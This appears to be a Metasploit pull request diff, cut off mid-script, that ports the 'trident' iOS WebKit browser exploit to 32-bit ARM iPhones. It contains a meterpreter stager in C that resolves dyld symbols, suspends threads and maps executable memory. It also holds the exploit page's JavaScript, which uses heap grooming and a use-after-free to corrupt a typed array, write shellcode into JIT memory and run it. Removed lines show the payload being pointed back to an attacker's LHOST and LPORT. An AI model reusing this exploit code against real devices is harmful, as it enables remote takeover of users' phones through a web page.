### PR TITLE
Work in progress attempt to convert the iPhone trident exploit to armle (e.g iPhone 5C and earlier devices).

### DIFF
--- a/external/source/shellcode/apple_ios/armle/Makefile
+++ b/external/source/shellcode/apple_ios/armle/Makefile
@@ -1,0 +1,52 @@
+CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
+GCC_BIN_OSX=`xcrun --sdk macosx -f gcc`
+GCC_BIN_IOS=`xcrun --sdk iphoneos -f gcc`
+GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
+GCC_BASE_IOS=$(GCC_BIN_IOS) $(CFLAGS)
+GCC_OSX=$(GCC_BASE_OSX) -arch x86_64
+SDK_IOS=`xcrun --sdk iphoneos --show-sdk-path`
+GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS)
+GCC_IOS_32=$(GCC_BASE_IOS) -arch armv7 -isysroot $(SDK_IOS)
+
+all: clean main_osx main_ios main_ios32 log
+
+main_osx: main.c
+	$(GCC_OSX) -o $@ $^
+
+main_ios: main.c
+	$(GCC_IOS) -o $@ $^
+	ldid -S main_ios
+
+main_ios32: main.c
+	$(GCC_IOS_32) -o $@ $^
+	ldid -Sent.xml main_ios32
+
+log: log.c
+	$(GCC_IOS_32) -o $@ $^
+	ldid -S log
+
+shellcode: main_ios32
+	otool -tv main_ios32
+
+flatten: flatten-macho.m
+	$(GCC_OSX) -o $@ $^
+
+flatten32: flatten-macho32.m
+	$(GCC_OSX) -o $@ $^
+
+main_vm: flatten main_ios
+	./flatten main_ios main_vm
+
+main_vm32: flatten32 main_ios32
+	./flatten32 main_ios32 main_vm32
+
+log_vm32: flatten32 log
+	./flatten32 log log_vm32
+
+install: main_ios32
+	ruby met.rb main_ios32
+	cp main_ios32.bin ../../../../../data/meterpreter/armle_iphone_stage
+
+clean:
+	rm -f *.o main_osx main_ios main_ios32
+

--- a/external/source/shellcode/apple_ios/armle/ent.xml
+++ b/external/source/shellcode/apple_ios/armle/ent.xml
@@ -1,0 +1,10 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>dynamic-codesigning</key>
+	<true/>
+	<key>platform-application</key>
+	<true/>
+</dict>
+</plist>

--- a/external/source/shellcode/apple_ios/armle/log.c
+++ b/external/source/shellcode/apple_ios/armle/log.c
@@ -1,0 +1,10 @@
+#include <stdio.h>
+#include <string.h>
+
+#include <asl.h>
+
+int main() {
+  asl_log(0, 0, ASL_LEVEL_ERR, "hello from log!\n");
+  return 0;
+}
+

--- a/external/source/shellcode/apple_ios/armle/main.c
+++ b/external/source/shellcode/apple_ios/armle/main.c
@@ -1,0 +1,444 @@
+#include <stdio.h>
+#include <string.h>
+
+#include <mach-o/loader.h>
+#include <mach-o/nlist.h>
+#include <mach-o/dyld.h>
+#include <mach/mach.h>
+
+#include <dlfcn.h>
+#include <asl.h>
+
+#include <sys/types.h>
+#include <sys/sysctl.h>
+
+#include <sys/mman.h>
+
+#if __aarch64__
+typedef struct mach_header_64 mach_header_t;
+typedef struct segment_command_64 segment_command_t;
+typedef struct section_64 section_t;
+typedef struct nlist_64 nlist_t;
+#define MH_MAGIC_T MH_MAGIC_64
+#define LC_SEGMENT_T LC_SEGMENT_64
+#else
+typedef struct mach_header mach_header_t;
+typedef struct segment_command segment_command_t;
+typedef struct section section_t;
+typedef struct nlist nlist_t;
+#define MH_MAGIC_T MH_MAGIC
+#define LC_SEGMENT_T LC_SEGMENT
+#endif
+
+//https://github.com/opensource-apple/dyld/blob/master/configs/dyld.xcconfig - iOS 9.3.4
+#ifdef __x86_64
+#define DYLD_BASE_ADDRESS 0x7fff5fc00000
+#elif __arm64
+#define DYLD_BASE_ADDRESS 0x120000000
+#elif __arm
+#define DYLD_BASE_ADDRESS 0x1fe00000
+#else
+#endif
+
+static void crash() {
+  *(volatile int*)0x41414141 = 0x42424242;
+}
+
+struct dyld_cache_header
+{
+  char        magic[16];        // e.g. "dyld_v0     ppc"
+  uint32_t    mappingOffset;    // file offset to first shared_file_mapping
+  uint32_t    mappingCount;     // number of shared_file_mapping entries
+  uint32_t    imagesOffset;     // file offset to first dyld_cache_image_info
+  uint32_t    imagesCount;      // number of dyld_cache_image_info entries
+  uint64_t    dyldBaseAddress;  // base address of dyld when cache was built
+  uint64_t    codeSignatureOffset;
+  uint64_t    codeSignatureSize;
+  uint64_t    slideInfoOffset;
+  uint64_t    slideInfoSize;
+  uint64_t    localSymbolsOffset;
+  uint64_t    localSymbolsSize;
+  char        uuid[16];
+};
+
+struct shared_file_mapping 
+{
+  uint64_t    address;
+  uint64_t    size;
+  uint64_t    file_offset;
+  uint32_t    max_prot;
+  uint32_t    init_prot;
+};
+
+struct dyld_cache_image_info
+{
+  uint64_t    address;
+  uint64_t    modTime;
+  uint64_t    inode;
+  uint32_t    pathFileOffset;
+  uint32_t    pad;
+};
+
+long syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6);
+int main(int argc, char** argv);
+void* get_dyld_function(const char* function_symbol);
+void resolve_dyld_symbol(uint32_t base, void** dlopen_pointer, void** dlsym_pointer);
+uint64_t syscall_chmod(uint64_t path, long mode);
+uint64_t syscall_shared_region_check_np();
+uint32_t syscall_write(uint32_t fd, const char* buf, uint32_t size);
+uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer);
+void init();
+
+int main(int argc, char** argv)
+{
+  init();
+  return 0;
+}
+
+typedef int (*asl_log_ptr)(aslclient asl, aslmsg msg, int level, const char *format, ...);
+asl_log_ptr asl_log_func = 0;
+
+void init()
+{
+  /*printf("syscall_write\n");*/
+  /*syscall_write(1, "lal\n", 4);*/
+  /*printf("syscall_write done\n");*/
+
+  /*printf("dyld %p\n", (void*)dyld);*/
+
+  /*typedef void (*dyld_start_ptr)(struct macho_header* asl, int argc, char const**argv, int apple);*/
+  /*dyld_start_ptr dyld_start_func = dyld + 0x1000;*/
+  /*char *main_argv[] = { "xk", NULL };*/
+  /*char *jit_region = (void*)init + 0x10000;*/
+  /*memcpy(jit_region, macho_file, sizeof(macho_file));*/
+  /*dyld_start_func((struct macho_header*)jit_region, 1, main_argv, 0);*/
+
+  void* dlopen_addr = 0;
+  void* dlsym_addr = 0;
+
+#if __aarch64__
+  dlsym_addr = get_dyld_function("_dlsym");
+  dlopen_addr = get_dyld_function("_dlopen");
+#else
+  uint64_t start = DYLD_BASE_ADDRESS;
+  /*if (sierra) {*/
+  /*}*/
+  uint64_t dyld = find_macho(start, 0x1000, 0);
+
+  resolve_dyld_symbol(dyld, &dlopen_addr, &dlsym_addr);
+#endif
+
+  typedef void* (*dlopen_ptr)(const char *filename, int flags);
+  typedef void* (*dlsym_ptr)(void *handle, const char *symbol);
+  dlopen_ptr dlopen_func = dlopen_addr;
+  dlsym_ptr dlsym_func = dlsym_addr;
+  void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW);
+  asl_log_func = dlsym_func(libsystem, "asl_log");
+  asl_log_func(0, 0, ASL_LEVEL_ERR, "hello from metasploit!\n");
+  asl_log_func(0, 0, ASL_LEVEL_ERR, "hello from metasploit!\n");
+  asl_log_func(0, 0, ASL_LEVEL_ERR, "hello from metasploit!\n");
+  asl_log_func(0, 0, ASL_LEVEL_ERR, "hello from metasploit!\n");
+  asl_log_func(0, 0, ASL_LEVEL_ERR, "hello from metasploit!\n");
+  asl_log_func(0, 0, ASL_LEVEL_ERR, "hello from metasploit!\n");
+
+  // Suspend threads
+  typedef mach_port_t (*mach_task_self_ptr)();
+  typedef thread_port_t (*mach_thread_self_ptr)();
+  typedef kern_return_t (*thread_suspend_ptr)(thread_act_t target_thread);
+  typedef kern_return_t (*task_threads_ptr)(task_t task, thread_act_array_t thread_list, mach_msg_type_number_t* thread_count);
+  void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW);
+  mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self");
+  mach_thread_self_ptr mach_thread_self_func = dlsym_func(libIOKit, "mach_thread_self");
+  thread_suspend_ptr thread_suspend_func = dlsym_func(libsystem, "thread_suspend");
+  task_threads_ptr task_threads_func = dlsym_func(libsystem, "task_threads");
+  thread_act_t current_thread = mach_thread_self_func();
+  mach_msg_type_number_t thread_count;
+  thread_act_array_t thread_list;
+  kern_return_t result = task_threads_func(mach_task_self_func(), &thread_list, &thread_count);
+  if (!result && thread_count) {
+    for (unsigned int i = 0; i < thread_count; ++i) {
+      thread_act_t other_thread = thread_list[i];
+      if (other_thread != current_thread) {
+        thread_suspend_func(other_thread);
+      }
+    }
+  }
+
+  // TODO load meterpreter macho
+  crash();
+
+  FILE *f = fopen("log_vm32", "rb");
+  fseek(f, 0, SEEK_END);
+  long fsize = ftell(f);
+  fseek(f, 0, SEEK_SET);
+  void *jit_region = mmap(NULL, fsize, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE|MAP_JIT, 0,0);//0x40000000, 0);
+  if (jit_region == MAP_FAILED) {
+    perror("Cannot mmap JIT RWX region");
+    return;
+  }
+  fread(jit_region, fsize, 1, f);
+  fclose(f);
+
+  printf("yay jit %p = %p\n", jit_region, *(int*)jit_region);
+  /*printf("yay dso %p\n", __dso_handle);*/
+  printf("yay dyld %p = %p\n", dyld, *(int*)dyld);
+  void* dyld_start = (void*)(dyld + 0x1000);
+  printf("yay dyld_start? %p = %p\n", dyld_start, *(int*)(dyld_start));
+  /*printf("yay main %p = %p\n", main, *(int*)main);*/
+
+  fflush(stdout);
+
+  /*void* libdyld = dlopen_func("/usr/lib/system/libdyld.dylib", RTLD_NOW);*/
+  /*printf("yay libdyld %p = %p\n", libdyld, *(int*)dyld);*/
+  /*fflush(stdout);*/
+
+  uint64_t shared_region_start = syscall_shared_region_check_np();
+
+  struct dyld_cache_header *header = (void*)shared_region_start;
+  struct shared_file_mapping *sfm = (void*)header + header->mappingOffset;
+  struct dyld_cache_image_info *dcimg = (void*)header + header->imagesOffset;
+  uint64_t libdyld_address;
+  for (size_t i=0; i < header->imagesCount; i++) {
+    char * pathFile = (char *)shared_region_start+dcimg->pathFileOffset;
+    if (string_compare(pathFile, "/usr/lib/system/libdyld.dylib") == 0) {
+      libdyld_address = dcimg->address;
+      break;
+    }
+    dcimg++;
+  }
+  void* vm_slide_offset  = (void*)header - sfm->address;
+  printf("vm slide = %p\n", vm_slide_offset);
+  libdyld_address = (libdyld_address + vm_slide_offset);
+
+  mach_header_t *mh = (mach_header_t*)libdyld_address;
+
+  printf("yay libdyld %p = %p\n", mh, *(int*)mh);
+  void* libdyld_start = (void*)(mh + 0x1000);
+
+  printf("yay libdyld_start? %p = %p\n", libdyld_start, *(int*)(libdyld_start));
+  fflush(stdout);
+
+  int slide = 0;
+
+/*0x2872*/
+  /*typedef void (*dyld_start_ptr)(struct macho_header* asl, int argc, char const **argv, char const **envp);*/
+  /*char *main_argv[] = { "xk", NULL };*/
+  /*char *jit_region = (void*)init + 0x10000;*/
+  /*memcpy(jit_region, macho_file, sizeof(macho_file));*/
+  /*dyld_start_ptr dyld_start_func = libdyld_address + 0x2874;*/
+  /*dyld_start_ptr dyld_start_func = dyld_start;*/
+  /*dyld_start_func((struct macho_header*)0, 1, &main_argv, &slide);*/
+
+  printf("finished\n");
+  fflush(stdout);
+
+  //crash and check the stackframe
+  /*crash();*/
+}
+
+
+uint32_t syscall_write(uint32_t fd, const char* buf, uint32_t size)
+{
+  return syscall(4, fd, buf, size, 0, 0, 0);
+}
+
+uint64_t syscall_chmod(uint64_t path, long mode)
+{
+  return syscall(15, path, mode, 0, 0, 0, 0);
+}
+
+uint64_t syscall_shared_region_check_np()
+{
+  uint64_t address = 0;
+  syscall(294, &address, 0, 0, 0, 0, 0);
+  return address;
+}
+
+long syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6){
+  long ret;
+#ifdef __x86_64
+  asm volatile (
+      "movq %1, %%rax\n\t"
+      "movq %2, %%rdi\n\t"
+      "movq %3, %%rsi\n\t"
+      "movq %4, %%rdx\n\t"
+      "movq %5, %%rcx\n\t"
+      "movq %6, %%r8\n\t"
+      "movq %7, %%r9\n\t"
+      "syscall"
+      : "=a"(ret)
+      : "g"(syscall_number), "g"(arg1), "g"(arg2), "g"(arg3), "g"(arg4), "g"(arg5), "g"(arg6)    );
+#elif __arm__
+  volatile register uint32_t r12 asm("r12") = syscall_number;
+  volatile register uint32_t r0 asm("r0") = arg1;
+  volatile register uint32_t r1 asm("r1") = arg2;
+  volatile register uint32_t r2 asm("r2") = arg3;
+  volatile register uint32_t r3 asm("r3") = arg4;
+  volatile register uint32_t r4 asm("r4") = arg5;
+  volatile register uint32_t r5 asm("r5") = arg6;
+  volatile register uint32_t xret asm("r0");
+  asm volatile (
+      "mov r0, %2\n"
+      "mov r1, %3\n"
+      "mov r2, %4\n"
+      "mov r3, %5\n"
+      "mov r4, %6\n"
+      "mov r5, %7\n"
+      "mov r12, %1\n"
+      "swi 0x80\n"
+      "mov %0, r0\n"
+      : "=r"(xret)
+      : "r"(r12), "r"(r0), "r"(r1), "r"(r2), "r"(r3), "r"(r4), "r"(r5)
+      : "r0", "r1", "r2", "r3", "r4", "r5", "r12");
+  ret = xret;
+#elif __aarch64__
+  // : ¯\_(ツ)_/¯
+	volatile register uint64_t x16 asm("x16") = syscall_number;
+	volatile register uint64_t x0 asm("x0") = arg1;
+	volatile register uint64_t x1 asm("x1") = arg2;
+	volatile register uint64_t x2 asm("x2") = arg3;
+	volatile register uint64_t x3 asm("x3") = arg4;
+	volatile register uint64_t x4 asm("x4") = arg5;
+	volatile register uint64_t x5 asm("x5") = arg6;
+	volatile register uint64_t xret asm("x0");
+  asm volatile (
+      "mov x0, %2\n\t"
+      "mov x1, %3\n\t"
+      "mov x2, %4\n\t"
+      "mov x3, %5\n\t"
+      "mov x4, %6\n\t"
+      "mov x5, %7\n\t"
+      "mov x16, %1\n\t"
+      "svc 0x80\n\t"
+      "mov %0, x0\n\t"
+      : "=r"(xret)
+      : "r"(x16), "r"(x0), "r"(x1), "r"(x2), "r"(x3), "r"(x4), "r"(x5)
+      : "x0", "x1", "x2", "x3", "x4", "x5", "x16");
+  ret = xret;
+#endif
+  return ret;
+}
+
+int string_compare(const char* s1, const char* s2) 
+{
+  while (*s1 != '\0' && *s1 == *s2)
+  {
+    s1++;
+    s2++;
+  }
+  return (*(unsigned char *) s1) - (*(unsigned char *) s2);
+}
+
+void * get_dyld_function(const char* function_symbol) 
+{
+  uint64_t shared_region_start = syscall_shared_region_check_np();
+
+  struct dyld_cache_header *header = (void*)shared_region_start;
+  struct shared_file_mapping *sfm = (void*)header + header->mappingOffset;
+  struct dyld_cache_image_info *dcimg = (void*)header + header->imagesOffset;
+  uint64_t libdyld_address;
+  for (size_t i=0; i < header->imagesCount; i++) {
+    char * pathFile = (char *)shared_region_start+dcimg->pathFileOffset;
+    if (string_compare(pathFile, "/usr/lib/system/libdyld.dylib") == 0) {
+      libdyld_address = dcimg->address;
+      break;
+    }
+    dcimg++;
+  }
+  void* vm_slide_offset  = (void*)header - sfm->address;
+  libdyld_address = (libdyld_address + vm_slide_offset);
+
+  mach_header_t *mh = (mach_header_t*)libdyld_address;
+  const struct load_command* cmd = (struct load_command*)(((char*)mh)+sizeof(mach_header_t));
+  struct symtab_command* symtab_cmd = 0;
+  segment_command_t* linkedit_cmd = 0;
+  segment_command_t* text_cmd = 0;
+
+  for (uint32_t i = 0; i < mh->ncmds; ++i) {
+    if (cmd->cmd == LC_SEGMENT_T) {
+      segment_command_t* segment_cmd = (struct segment_command_t*)cmd;
+      if (string_compare(segment_cmd->segname, SEG_TEXT) == 0) {
+        text_cmd = segment_cmd;
+      } else if (string_compare(segment_cmd->segname, SEG_LINKEDIT) == 0) {
+        linkedit_cmd = segment_cmd;
+      }
+    }
+    if (cmd->cmd == LC_SYMTAB) {
+      symtab_cmd = (struct symtab_command*)cmd;
+    }
+    cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
+  }
+
+  unsigned int file_slide = ((unsigned long)linkedit_cmd->vmaddr - (unsigned long)text_cmd->vmaddr) - linkedit_cmd->fileoff;
+  nlist_t *sym = (nlist_t*)((unsigned long)mh + (symtab_cmd->symoff + file_slide));
+  char *strings = (char*)((unsigned long)mh + (symtab_cmd->stroff + file_slide));
+
+  for (uint32_t i = 0; i < symtab_cmd->nsyms; ++i) {
+    if (sym->n_un.n_strx) {
+      char * symbol = strings + sym->n_un.n_strx;
+      if (string_compare(symbol, function_symbol) == 0) {
+        return sym->n_value + vm_slide_offset;
+      }
+    }
+    sym += 1;
+  }
+  return 0;
+}
+
+uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer) 
+{
+  while(1) {
+    uint64_t ptr = addr;
+    if (pointer) {
+      ptr = *(uint64_t *)ptr;
+    }
+    unsigned long ret = syscall_chmod(ptr, 0777);
+    if (ret == 0x2 && ((int *)ptr)[0] == MH_MAGIC_T) {
+      return ptr;
+    }
+
+    addr += increment;
+  }
+  return 0;
+}
+
+// Credits: http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html
+void resolve_dyld_symbol(uint32_t base, void** dlopen_pointer, void** dlsym_pointer)
+{
+  struct load_command* lc;
+  struct segment_command* sc;
+  struct segment_command* data;
+  struct section* data_const = 0;
+  lc = (struct load_command*)(base + sizeof(mach_header_t));
+
+  for (int i=0;i<((struct mach_header*)base)->ncmds; i++) {
+    if (lc->cmd == 0x1) {
+      sc = (struct segment_command*)lc;
+      switch(*((unsigned int *)&sc->segname[2])) {
+        case 0x41544144:
+          data = (struct segment_command*)lc;
+          break;
+      }
+    }
+    lc = (struct load_command *)((unsigned long)lc + lc->cmdsize);
+  }
+  data_const = data + 1;
+  for (int i=0; i<data->nsects; i++,data_const++) {
+    if (*(uint32_t*)&data_const->sectname[2] == 0x736e6f63) {
+      break;
+    }
+  }
+  uint32_t *dataConst = base + data_const->offset;
+
+  while (!*dlopen_pointer || !*dlsym_pointer) {
+    if (string_compare((char*)(dataConst[0]), "__dyld_dlopen") == 0) {
+      *dlopen_pointer = (void*)dataConst[1];
+    }
+    if (string_compare((char*)(dataConst[0]), "__dyld_dlsym") == 0) {
+      *dlsym_pointer = (void*)dataConst[1];
+    }
+    dataConst += 2;
+  }
+}
+
+

--- a/external/source/shellcode/apple_ios/armle/met.rb
+++ b/external/source/shellcode/apple_ios/armle/met.rb
@@ -1,0 +1,52 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+require 'macho'
+
+stager_file = ARGV[0]
+data = File.binread(stager_file)
+macho = MachO::MachOFile.new_from_bin(data)
+main_func = macho[:LC_MAIN].first
+entry_offset = main_func.entryoff
+
+start = -1
+min = -1
+max = 0
+for segment in macho.segments
+  next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
+  puts "segment: #{segment.segname} #{segment.vmaddr.to_s(16)}"
+  if min == -1 or min > segment.vmaddr
+    min = segment.vmaddr
+  end
+  if max < segment.vmaddr + segment.vmsize
+    max = segment.vmaddr + segment.vmsize
+  end
+end
+
+puts "data: #{min.to_s(16)} -> #{max.to_s(16)} #{(max - min).to_s(16)}"
+output_data = "\x00" * (max - min)
+
+for segment in macho.segments
+  #next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
+  puts "segment: #{segment.segname} off: #{segment.offset.to_s(16)} vmaddr: #{segment.vmaddr.to_s(16)} fileoff: #{segment.fileoff.to_s(16)}"
+  for section in segment.sections
+    puts "section: #{section.sectname} off: #{section.offset.to_s(16)} addr: #{section.addr.to_s(16)} size: #{section.size.to_s(16)}"
+    flat_addr = section.addr - min
+    section_data = data[section.offset, section.size]
+    puts "flat_addr: #{flat_addr.to_s(16)}"
+    #file_section = section.offset
+    #puts "info: #{segment.fileoff.to_s(16)} #{segment.offset.to_s(16)} #{section.size.to_s(16)} #{file_section.to_s(16)}"
+    #puts "?: #{data.size.to_s(16)} #{file_section.to_s(16)}"
+    if section_data
+      if start == -1 or start > flat_addr
+        start = flat_addr
+      end
+      output_data[flat_addr, section_data.size] = section_data
+    end
+  end
+end
+
+puts "start: #{start.to_s(16)}"
+output_data = output_data[start..-1]
+File.binwrite(stager_file + ".bin", output_data)
+

--- a/modules/exploits/apple_ios/browser/webkit_trident.rb
+++ b/modules/exploits/apple_ios/browser/webkit_trident.rb
@@ -52,246 +52,244 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Request from #{request['User-Agent']}")
     if request.uri =~ %r{/loader$}
       print_good("Target is vulnerable.")
-      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
+      local_file = File.join( Msf::Config.data_directory, "meterpreter", "armle_iphone_stage" )
       loader_data = File.read(local_file, {:mode => 'rb'})
       send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
-      return
-    elsif request.uri =~ %r{/exploit$}
-      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
-      loader_data = File.read(local_file, {:mode => 'rb'})
-      payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
-      payload_url_index = loader_data.index('PAYLOAD_URL')
-      loader_data[payload_url_index, payload_url.length] = payload_url
-      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
-      print_status("Sent exploit (#{loader_data.size} bytes)")
       return
     end
     html = %Q^
 <html>
 <body>
 <script>
- function load_binary_resource(url) {
-   var req = new XMLHttpRequest();
-   req.open('GET', url, false);
-   req.overrideMimeType('text/plain; charset=x-user-defined');
-   req.send(null);
-   return req.responseText;
- }
- var mem0 = 0;
- var mem1 = 0;
- var mem2 = 0;
+function load_binary_resource(url) {
+  var req = new XMLHttpRequest();
+  req.open('GET', url, false);
+  req.overrideMimeType('text/plain; charset=x-user-defined');
+  req.send(null);
+  return req.responseText;
+}
 
- function read4(addr) {
-  mem0[4] = addr;
-  var ret = mem2[0];
-  mem0[4] = mem1;
-  return ret;
- }
+var pressure = new Array(400);
+var bufs = new Array(10000);
 
- function write4(addr, val) {
-  mem0[4] = addr;
-  mem2[0] = val;
-  mem0[4] = mem1;
- }
- filestream = load_binary_resource("exploit")
- var shll = new Uint32Array(filestream.length / 4);
- for (var i = 0; i < filestream.length;) {
-  var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
-  shll[i / 4] = word;
-  i += 4;
- }
- _dview = null;
- function u2d(low, hi) {
-  if (!_dview) _dview = new DataView(new ArrayBuffer(16));
-  _dview.setUint32(0, hi);
-  _dview.setUint32(4, low);
-  return _dview.getFloat64(0);
- }
- var pressure = new Array(100);
- var bufs = new Array(10000);
- dgc = function() {
-  for (var i = 0; i < pressure.length; i++) {
-   pressure[i] = new Uint32Array(0x10000);
-  }
-  for (var i = 0; i < pressure.length; i++) {
-   pressure[i] = 0;
-  }
- }
+var fcp = 0;
+var smsh = new Uint32Array(0x10);
 
- function swag() {
-  if (bufs[0]) return;
-  for (var i = 0; i < 4; i++) {
-    dgc();
-  }
-  for (i = 0; i < bufs.length; i++) {
-   bufs[i] = new Uint32Array(0x100 * 2)
-   for (k = 0; k < bufs[i].length;) {
-    bufs[i][k++] = 0x41414141;
-    bufs[i][k++] = 0xffff0000;
-   }
-  }
- }
- var trycatch = "";
- for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
- var fc = new Function(trycatch);
- var fcp = 0;
- var smsh = new Uint32Array(0x10)
+var trycatch = "";
+for(var z=0; z<0x2000; z++) trycatch += "try{} catch(e){}; ";
+var fc = new Function(trycatch);
 
- function smashed(stl) {
-  document.body.innerHTML = "";
-  var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);
-  write4(jitf, 0xd28024d0);         //movz x16, 0x126
-  write4(jitf + 4, 0x58000060);     //ldr x0, 0x100007ee4
-  write4(jitf + 8, 0xd4001001);     //svc 80
-  write4(jitf + 12, 0xd65f03c0);    //ret
-  write4(jitf + 16, jitf + 0x20);
-  write4(jitf + 20, 1);
+function swag() {
+	if(bufs[0]) return;
+
+	dgc();
+
+	for (i=0; i < bufs.length; i++) {
+    bufs[i] = new Uint32Array(0x100*2)
+		for (k=0; k < bufs[i].length; )
+		{
+			bufs[i][k++] = 0x41414141;
+			bufs[i][k++] = 0xffff0000;
+		}
+	}
+  console.log("doneswag");
+}
+
+function smashed() {
+
+  var filestream = load_binary_resource("loader");
+  console.log("smsh len="+smsh.length);
+
+  console.log("fcp=0x"+fcp.toString(16));
+  console.log("binfile=0x"+binfile.toString(16));
+
+
+  // getJIT
+  r2 = smsh[(fcp+0x14)/4];
+  r3 = smsh[(r2+0x10)/4];
+  shellcode = (smsh[(r3+0x14)/4]&0xfffff000)-0x10000;
+  console.log("r2=0x"+r2.toString(16));
+  console.log("r3=0x"+r3.toString(16));
+  console.log("shellcode=0x"+shellcode.toString(16));
+
+  smsh[shellcode/4] = 0;
+  shellcode += 4;
+
+  smsh[shellcode/4] = 0;
+  shellcode += 4;
+
+  smsh[shellcode/4] = 0;
+  shellcode += 4;
+
+  smsh[shellcode/4] = 0;
+  shellcode += 4;
+
+  for(var i = 0; i < filestream.length; i+=4)
+  {
+    var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i+1) & 0xff) << 8)  | ((filestream.charCodeAt(i+2) & 0xff) << 16)  | ((filestream.charCodeAt(i+3) & 0xff) << 24);
+    smsh[(shellcode+i)/4] = word;
+  }
+
+  smsh[(fcp+0x00)/4] = fcp+4;
+  smsh[(fcp+0x04)/4] = fcp+4;
+  smsh[(fcp+0x08)/4] = shellcode+1; //PC
+  smsh[(fcp+0x30)/4] = fcp+0x30+4-0x18-0x34+0x8;
+
+
+  console.log("Do fc() smashed");
   fc();
-  var dyncache = read4(jitf + 0x20);
-  var dyncachev = read4(jitf + 0x20);
-  var go = 1;
-  while (go) {
-   if (read4(dyncache) == 0xfeedfacf) {
-    for (i = 0; i < 0x1000 / 4; i++) {
-     if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
-     {
-      go = 0;
-      break;
-     }
-    }
-   }
-   dyncache += 0x1000;
-  }
-  dyncache -= 0x1000;
-  var bss = [];
-  var bss_size = [];
-  for (i = 0; i < 0x1000 / 4; i++) {
-   if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
-    bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
-    bss_size.push(read4(dyncache + i * 4 + (0x28)));
-   }
-  }
-  var shc = jitf;
-  var filestream = load_binary_resource("loader")
-  for (var i = 0; i < filestream.length;) {
-   var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
-   write4(shc, word);
-   shc += 4;
-   i += 4;
-  }
-  jitf &= ~0x3FFF;
-  jitf += 0x8000;
-  write4(shc, jitf);
-  write4(shc + 4, 1);
-  // copy macho
-  for (var i = 0; i < shll.length; i++) {
-   write4(jitf + i * 4, shll[i]);
-  }
-  for (var i = 0; i < bss.length; i++) {
-   for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
-    write4(bss[i] + k * 4, 0);
-   }
-  }
-  fc();
- }
 
- function go_() {
-  if (smsh.length != 0x10) {
-   smashed();
-   return;
-  }
-  dgc();
-  var arr = new Array(0x100);
-  var yolo = new ArrayBuffer(0x1000);
-  arr[0] = yolo;
-  arr[1] = 0x13371337;
+  console.log("end smashed");
+}
+
+dgc = function() {
+  console.log("dgc start");
+	for (var i = 0; i < pressure.length; i++) {
+    pressure[i] = new Uint32Array(0xa000);
+	}
+  console.log("dgc done");
+}
+dgcf = function() {
+  console.log("dgcf start");
+	for (var i = 0; i < pressure.length; i++) {
+		pressure[i] = 0
+	}
+  console.log("dgcf done");
+}
+
+function swag() {
+	if(bufs[0]) return;
+
+	dgc();
+
+	for (i=0; i < bufs.length; i++) {
+		bufs[i] = new Uint32Array(0x100*2)
+		for (k=0; k < bufs[i].length; )
+		{
+			bufs[i][k++] = 0x41414141;
+			bufs[i][k++] = 0xffff0000;
+		}
+	}
+}
+
+var binfile = 0;
+var mem0=0;
+var mem1=0;
+var mem2=0;
+
+_dview = null;
+function u2d(low, hi) {
+    if (!_dview) _dview = new DataView(new ArrayBuffer(16));
+    _dview.setUint32(0, hi);
+    _dview.setUint32(4, low);
+    return _dview.getFloat64(0);
+}
+
+function go_(){
+  var arr = new Array(2047);
   var not_number = {};
   not_number.toString = function() {
-   arr = null;
-   props["stale"]["value"] = null;
-   swag();
-   return 10;
+    arr = null;
+    props["stale"]["value"] = null;
+    swag();
+    return 10;
   };
+
+  smsh[0] = 0x21212121;
+  smsh[1] = 0x31313131;
+  smsh[2] = 0x41414141;
+  smsh[3] = 0x51515151;
+  smsh[4] = 0x61616161;
+  smsh[5] = 0x71717171;
+  smsh[6] = 0x81818181;
+  smsh[7] = 0x91919191;
+
   var props = {
-   p0: {
-    value: 0
-   },
-   p1: {
-    value: 1
-   },
-   p2: {
